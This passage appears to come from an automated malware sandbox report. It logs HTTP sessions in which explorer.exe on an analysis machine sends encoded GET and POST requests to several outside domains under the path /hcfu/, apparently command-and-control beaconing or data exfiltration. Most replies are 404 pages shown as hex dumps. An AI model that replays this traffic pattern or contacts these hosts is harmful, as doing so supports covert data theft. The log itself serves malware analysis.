Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.16.1</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
31	192.168.2.7	49735	74.124.203.191	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 24, 2022 11:09:14.768256903 CEST	427	OUT	GET /hcfu/?5jSp=DfjdjluHJP1L6t&u0Gp2vp8=BxtzAL4W5AO3uLI59q371KiLBxUzW2j+OYwN/F4Eg4C0p2x+AnoX0pyIV2L0uhGw1+4403oJ3BUP5BdGKU8IqK17GGLz449g8HGlF3Hp/yIQ HTTP/1.1 Host: www.wewantabreak.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 24, 2022 11:09:14.928173065 CEST	427	IN	HTTP/1.1 404 Not Found Date: Mon, 24 Oct 2022 09:09:14 GMT Server: Apache Content-Length: 236 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 61 79 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 20 6f 72 20 72 65 2d 6e 61 6d 65 64 2e 20 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 77 65 62 20 73 69 74 65 20 6f 77 6e 65 72 20 66 6f 72 20 66 75 72 74 68 65 72 20 61 73 73 69 73 74 61 6e 63 65 2e 3c 2f 70 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>Error 404 - Not Found</title><head><body><h1>Error 404 - Not Found</h1><p>The document you are looking for may have been removed or re-named. Please contact the web site owner for further assistance.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.7	49708	217.160.0.87	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 24, 2022 11:07:01.766500950 CEST	358	OUT	GET /hcfu/?5jSp=DfjdjluHJP1L6t&u0Gp2vp8=3O8YptSPemKM8sIzZF8JOEGsdynbMd9NIarJRYJ/0cybmcm84igDod77Kw8YrhDfbeeXJmV/Xta+McyiqIfptDKdRtzZKR6FvkWjf1CaB2nt HTTP/1.1 Host: www.occludy.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 24, 2022 11:07:01.791923046 CEST	359	IN	HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 626 Connection: close Date: Mon, 24 Oct 2022 09:07:01 GMT Server: Apache Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 22 3e 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 30 61 33 32 38 63 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 30 65 6d 3b 22 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 68 31 3e 0a 20 20 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 65 6d 3b 22 3e 0a 20 20 20 59 6f 75 72 20 62 72 6f 77 73 65 72 20 63 61 6e 27 74 20 66 69 6e 64 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 20 63 6f 72 72 65 73 70 6f 6e 64 69 6e 67 20 74 6f 20 74 68 65 20 55 52 4c 20 79 6f 75 20 74 79 70 65 64 20 69 6e 2e 0a 20 20 3c 2f 70 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Your browser can't find the document corresponding to the URL you typed in. </p> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.7	49709	155.159.61.221	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 24, 2022 11:07:07.308382988 CEST	360	OUT	POST /hcfu/ HTTP/1.1 Host: www.patrickguarte.com Connection: close Content-Length: 194 Cache-Control: no-cache Origin: http://www.patrickguarte.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.patrickguarte.com/hcfu/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 75 30 47 70 32 76 70 38 3d 64 72 35 48 63 4c 70 54 58 75 56 56 31 4f 39 4b 68 58 32 41 51 38 75 57 61 34 37 5a 31 6a 38 35 6c 75 36 5a 33 5f 73 5a 45 6d 6f 6b 37 6f 4a 39 44 37 57 4b 37 33 6e 66 6b 68 49 38 41 6e 36 74 55 35 4e 77 6d 75 45 57 43 71 58 68 6a 6e 53 53 77 37 41 52 6e 71 50 77 37 5a 39 77 57 4a 62 30 43 44 42 33 67 76 6c 54 42 6b 6b 44 74 43 32 67 71 4c 42 4e 58 6b 51 57 4d 39 4d 6e 4e 5a 4c 51 54 6f 59 53 68 38 77 6c 70 6f 59 64 4a 62 56 65 57 76 6f 6d 66 79 55 50 6f 42 76 65 6f 45 4d 45 28 63 67 77 51 6d 48 61 4c 4a 58 47 31 47 77 30 71 54 75 64 36 63 4d 2e 00 00 00 00 00 00 00 00 Data Ascii: u0Gp2vp8=dr5HcLpTXuVV1O9KhX2AQ8uWa47Z1j85lu6Z3_sZEmok7oJ9D7WK73nfkhI8An6tU5NwmuEWCqXhjnSSw7ARnqPw7Z9wWJb0CDB3gvlTBkkDtC2gqLBNXkQWM9MnNZLQToYSh8wlpoYdJbVeWvomfyUPoBveoEME(cgwQmHaLJXG1Gw0qTud6cM.
Oct 24, 2022 11:07:07.630737066 CEST	360	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 24 Oct 2022 09:07:07 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.7	49710	155.159.61.221	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 24, 2022 11:07:09.654423952 CEST	361	OUT	GET /hcfu/?u0Gp2vp8=QpRnf8hbMplr0MVruU+mSsmXd47Y/RN6g+aq49FGHEQqzvBAGK38lH6pvC4RIkCAaMFgrfUcGt/BsHWKvIAR7oL0ypwQXqHPXRUpgIJQNUAI&5jSp=DfjdjluHJP1L6t HTTP/1.1 Host: www.patrickguarte.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 24, 2022 11:07:09.979324102 CEST	361	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 24 Oct 2022 09:07:09 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.7	49711	46.249.204.182	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 24, 2022 11:07:15.103127003 CEST	363	OUT	POST /hcfu/ HTTP/1.1 Host: www.opulentdome.uk Connection: close Content-Length: 194 Cache-Control: no-cache Origin: http://www.opulentdome.uk User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.opulentdome.uk/hcfu/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 75 30 47 70 32 76 70 38 3d 49 6c 6c 5f 47 33 34 50 32 36 6a 48 58 38 6e 4d 38 35 36 79 4d 4b 49 68 6c 4a 39 49 4b 4a 4a 47 41 52 71 53 4a 69 56 76 52 68 52 33 4a 44 66 4f 4f 50 38 67 78 67 4e 41 58 7a 50 5f 50 6e 4b 6b 6c 51 49 51 61 52 6c 53 69 66 69 55 58 53 66 31 68 56 77 42 37 57 6c 72 65 6a 73 4e 68 42 38 55 44 76 46 6a 4c 4c 7e 69 39 2d 6b 44 63 58 52 45 46 5a 42 76 67 79 68 42 31 72 31 69 4d 4d 6a 4d 4c 62 47 62 71 58 53 6c 4b 47 51 51 54 6a 45 65 72 4b 45 6c 4b 6a 6b 6b 46 65 42 30 76 6b 47 2d 52 56 37 36 4c 52 6f 47 51 62 7a 65 57 76 42 55 4e 32 68 35 7a 64 45 2e 00 00 00 00 00 00 00 00 Data Ascii: u0Gp2vp8=Ill_G34P26jHX8nM856yMKIhlJ9IKJJGARqSJiVvRhR3JDfOOP8gxgNAXzP_PnKklQIQaRlSifiUXSf1hVwB7WlrejsNhB8UDvFjLL~i9-kDcXREFZBvgyhB1r1iMMjMLbGbqXSlKGQQTjEerKElKjkkFeB0vkG-RV76LRoGQbzeWvBUN2h5zdE.
Oct 24, 2022 11:07:15.167011023 CEST	364	IN	HTTP/1.1 404 Not Found Date: Mon, 24 Oct 2022 09:07:15 GMT Server: Apache Vary: accept-language,accept-charset,User-Agent Accept-Ranges: bytes Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 Content-Language: en Data Raw: 63 38 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 0d 0a 65 0d 0a 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 0d 0a 31 33 0d 0a 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 0d 0a 33 38 0d 0a 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 76 3d 22 6d 61 64 65 22 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 0d 0a 31 31 33 0d 0a 25 35 62 6e 6f 25 32 30 61 64 64 72 65 73 73 25 32 30 67 69 76 65 6e 25 35 64 22 20 2f 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 2f 2a 2d 2d 3e 3c 21 5b 43 44 41 54 41 5b 2f 2a 3e 3c 21 2d 2d 2a 2f 20 0a 20 20 20 20 62 6f 64 79 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 20 7d 0a 20 20 20 20 61 3a 6c 69 6e 6b 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 43 43 3b 20 7d 0a 20 20 20 20 70 2c 20 61 64 64 72 65 73 73 20 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 33 65 6d 3b 7d 0a 20 20 20 20 73 70 61 6e 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 73 6d 61 6c 6c 65 72 3b 7d 0a 2f 2a 5d 5d 3e 2a 2f 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 0d 0a 31 62 0d 0a 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 68 31 3e 0a 3c 70 3e 0a 0d 0a 33 39 0d 0a 0a 0a 20 20 20 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a 0a 20 20 0d 0a 32 33 0d 0a 0a 0a 20 20 20 20 54 68 65 20 6c 69 6e 6b 20 6f 6e 20 74 68 65 0a 20 20 20 20 3c 61 20 68 72 65 66 3d 22 0d 0a 38 30 0d 0a 68 74 74 70 3a 2f 2f 77 77 77 2e 6f 70 75 6c 65 6e 74 64 6f 6d 65 2e 75 6b 2f 68 63 66 75 2f 22 3e 72 65 66 65 72 72 69 6e 67 0a 20 20 20 20 70 61 67 65 3c 2f 61 3e 20 73 65 65 6d 73 20 74 6f 20 62 65 20 77 72 6f 6e 67 20 6f 72 20 6f 75 74 64 61 74 65 64 2e 20 50 6c 65 61 73 65 20 69 6e 66 6f 72 6d 20 74 68 65 20 61 75 74 68 6f 72 20 6f 66 0a 20 20 20 20 3c 61 20 68 72 65 66 3d 22 0d 0a 34 37 0d 0a 68 74 74 70 3a 2f 2f 77 77 77 2e 6f 70 75 6c 65 6e 74 64 6f 6d 65 2e 75 6b 2f 68 63 66 75 2f 22 3e 74 68 61 74 20 70 61 67 65 3c 2f 61 3e 0a 20 20 20 20 61 62 6f 75 74 20 74 68 65 20 65 72 72 6f 72 2e 0a 0a 20 20 0d 0a 32 0d 0a 0a 0a 0d 0a 39 0d 0a 3c 2f 70 3e 0a 3c 70 3e 0a 0d 0a 34 38 0d 0a 49 66 20 79 6f 75 20 74 68 69 6e 6b 20 74 68 69 73 20 69 73 20 61 20 73 65 72 76 65 72 20 65 72 72 6f 72 2c 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 0a 74 68 65 20 3c 61 20 68 Data Ascii: c8<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="een" xml:lang="13en"><head><title>38Object not found!</title><link rev="made" href="mailto:113%5bno%20address%20given%5d" /><style type="text/css">.../--><![CDATA[/>.../ body { color: #000000; background-color: #FFFFFF; } a:link { color: #0000CC; } p, address {margin-left: 3em;} span {font-size: smaller;}/...*/--></style></head><body><h1>1bObject not found!</h1><p>39 The requested URL was not found on this server. 23 The link on the <a href="80http://www.opulentdome.uk/hcfu/">referring page</a> seems to be wrong or outdated. Please inform the author of <a href="47http://www.opulentdome.uk/hcfu/">that page</a> about the error. 29</p><p>48If you think this is a server error, please contactthe <a h
Oct 24, 2022 11:07:15.167045116 CEST	364	IN	Data Raw: 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 0d 0a 32 62 0d 0a 25 35 62 6e 6f 25 32 30 61 64 64 72 65 73 73 25 32 30 67 69 76 65 6e 25 35 64 22 3e 77 65 62 6d 61 73 74 65 72 3c 2f 61 3e 2e 0a 0d 0a 31 31 0d 0a 0a 3c 2f 70 3e 0a 0a 3c 68 32 3e 45 72 72 6f Data Ascii: ref="mailto:2b%5bno%20address%20given%5d">webmaster</a>.11</p><h2>Error 21404</h2><address> <a href="/">25www.opulentdome.uk</a><br /> <span>29Apache</span></address></body></html>10

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.2.7	49712	46.249.204.182	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 24, 2022 11:07:17.157042027 CEST	365	OUT	GET /hcfu/?5jSp=DfjdjluHJP1L6t&u0Gp2vp8=FnNfFBdE6KPnVJCtupekHJkjgZFJe5QHOUSjJCZmfBdQKmSNG8cathNKdTXwFUOlpWErHg09uuesQ1LGhXMc+UdVb1pWxSsiOvNgB/qg6YJ5 HTTP/1.1 Host: www.opulentdome.uk Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 24, 2022 11:07:17.231091976 CEST	366	IN	HTTP/1.1 404 Not Found Date: Mon, 24 Oct 2022 09:07:17 GMT Server: Apache Vary: accept-language,accept-charset,User-Agent Accept-Ranges: bytes Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 Content-Language: en Data Raw: 63 38 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 0d 0a 65 0d 0a 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 0d 0a 31 33 0d 0a 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 0d 0a 33 38 0d 0a 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 76 3d 22 6d 61 64 65 22 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 0d 0a 31 31 33 0d 0a 25 35 62 6e 6f 25 32 30 61 64 64 72 65 73 73 25 32 30 67 69 76 65 6e 25 35 64 22 20 2f 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 2f 2a 2d 2d 3e 3c 21 5b 43 44 41 54 41 5b 2f 2a 3e 3c 21 2d 2d 2a 2f 20 0a 20 20 20 20 62 6f 64 79 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 20 7d 0a 20 20 20 20 61 3a 6c 69 6e 6b 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 43 43 3b 20 7d 0a 20 20 20 20 70 2c 20 61 64 64 72 65 73 73 20 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 33 65 6d 3b 7d 0a 20 20 20 20 73 70 61 6e 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 73 6d 61 6c 6c 65 72 3b 7d 0a 2f 2a 5d 5d 3e 2a 2f 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 0d 0a 31 62 0d 0a 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 68 31 3e 0a 3c 70 3e 0a 0d 0a 33 39 0d 0a 0a 0a 20 20 20 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a 0a 20 20 0d 0a 35 37 0d 0a 0a 0a 20 20 20 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 0a 20 20 20 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 0a 0a 20 20 0d 0a 32 0d 0a 0a 0a 0d 0a 39 0d 0a 3c 2f 70 3e 0a 3c 70 3e 0a 0d 0a 34 38 0d 0a 49 66 20 79 6f 75 20 74 68 69 6e 6b 20 74 68 69 73 20 69 73 20 61 20 73 65 72 76 65 72 20 65 72 72 6f 72 2c 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 0a 74 68 65 20 3c 61 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 0d 0a 32 62 0d 0a 25 35 62 6e 6f 25 32 30 61 64 64 72 65 73 73 25 32 30 67 69 76 65 6e 25 35 64 22 3e 77 65 62 6d 61 73 74 65 72 3c 2f 61 3e 2e 0a 0d 0a 31 31 0d 0a 0a 3c 2f 70 3e 0a 0a 3c 68 32 3e 45 72 72 6f 72 20 0d 0a 32 31 0d 0a 34 30 34 3c 2f 68 32 3e 0a 3c 61 64 64 72 65 73 73 3e 0a 20 20 3c 61 20 68 72 65 66 3d 22 2f 22 3e 0d 0a 32 35 0d 0a 77 77 77 2e 6f 70 75 6c 65 6e 74 64 6f 6d 65 2e 75 6b 3c 2f 61 3e 3c 62 72 20 2f 3e 0a 20 Data Ascii: c8<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="een" xml:lang="13en"><head><title>38Object not found!</title><link rev="made" href="mailto:113%5bno%20address%20given%5d" /><style type="text/css">.../--><![CDATA[/>.../ body { color: #000000; background-color: #FFFFFF; } a:link { color: #0000CC; } p, address {margin-left: 3em;} span {font-size: smaller;}/...*/--></style></head><body><h1>1bObject not found!</h1><p>39 The requested URL was not found on this server. 57 If you entered the URL manually please check your spelling and try again. 29</p><p>48If you think this is a server error, please contactthe <a href="mailto:2b%5bno%20address%20given%5d">webmaster</a>.11</p><h2>Error 21404</h2><address> <a href="/">25www.opulentdome.uk</a><br />
Oct 24, 2022 11:07:17.231126070 CEST	366	IN	Data Raw: 20 3c 73 70 61 6e 3e 0d 0a 32 39 0d 0a 41 70 61 63 68 65 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 31 0d 0a 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: <span>29Apache</span></address></body></html>10

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
9	192.168.2.7	49713	51.79.230.147	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 24, 2022 11:07:22.886236906 CEST	368	OUT	POST /hcfu/ HTTP/1.1 Host: www.malaya.live Connection: close Content-Length: 194 Cache-Control: no-cache Origin: http://www.malaya.live User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.malaya.live/hcfu/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 75 30 47 70 32 76 70 38 3d 54 2d 47 4c 72 63 69 35 39 66 4e 41 67 6e 52 48 59 79 77 72 45 46 52 59 37 52 4a 6b 63 4b 63 61 73 46 48 74 75 50 59 58 36 37 73 51 34 54 64 51 31 34 4d 33 70 55 30 6f 6a 44 32 33 63 35 71 4a 67 35 30 52 33 43 31 4e 51 74 64 37 59 68 4e 49 43 34 61 56 61 47 47 4e 45 37 63 56 38 4b 6a 47 54 75 74 37 52 39 53 72 6f 57 4b 79 45 51 77 31 67 7a 48 45 4d 74 73 32 6c 70 5a 57 52 41 49 46 36 54 6d 56 49 75 4d 5a 34 37 53 51 51 64 69 6c 73 70 35 55 4a 37 61 6e 69 35 61 34 4b 62 33 61 43 6e 6a 78 69 50 4c 78 36 41 55 7a 6f 30 56 66 28 33 37 72 57 6e 73 2e 00 00 00 00 00 00 00 00 Data Ascii: u0Gp2vp8=T-GLrci59fNAgnRHYywrEFRY7RJkcKcasFHtuPYX67sQ4TdQ14M3pU0ojD23c5qJg50R3C1NQtd7YhNIC4aVaGGNE7cV8KjGTut7R9SroWKyEQw1gzHEMts2lpZWRAIF6TmVIuMZ47SQQdilsp5UJ7ani5a4Kb3aCnjxiPLx6AUzo0Vf(37rWns.
Oct 24, 2022 11:07:23.522715092 CEST	369	IN	HTTP/1.1 404 Not Found Connection: close expires: Wed, 11 Jan 1984 05:00:00 GMT cache-control: no-cache, must-revalidate, max-age=0 content-type: text/html; charset=UTF-8 link: <https://malaya.live/wp-json/>; rel="https://api.w.org/" transfer-encoding: chunked content-encoding: gzip vary: Accept-Encoding date: Mon, 24 Oct 2022 09:07:23 GMT server: LiteSpeed x-frame-options: sameorigin strict-transport-security: max-age=31536000 Data Raw: 32 36 30 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 7d 6b 93 db 38 92 e0 e7 71 c4 fe 07 58 15 63 4b 6e 92 45 a9 9e a6 5a 9e 9b 7e c5 6d 44 cf ce c6 74 77 c4 ed d9 0e 07 44 42 12 db 14 c9 25 a1 7a 8c 5a ff 7d 23 33 01 12 7c 49 94 aa ec 9b 0f d7 1d d3 53 22 81 44 22 91 c8 17 32 c1 6f 5f fe f0 f7 ef 7f fd af ff fc 91 